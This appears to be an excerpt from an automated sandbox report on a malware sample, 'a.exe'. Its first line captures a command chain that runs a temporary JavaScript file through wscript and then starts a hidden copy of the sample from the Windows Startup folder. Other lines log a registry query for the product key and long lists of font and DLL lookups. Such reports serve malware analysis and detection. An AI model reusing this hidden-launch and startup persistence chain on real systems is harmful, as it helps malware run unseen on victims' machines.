                  Source: C:\ProgramData\a.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
                  Source: C:\ProgramData\a.exeQueries volume information: C:\ProgramData\a.exe VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
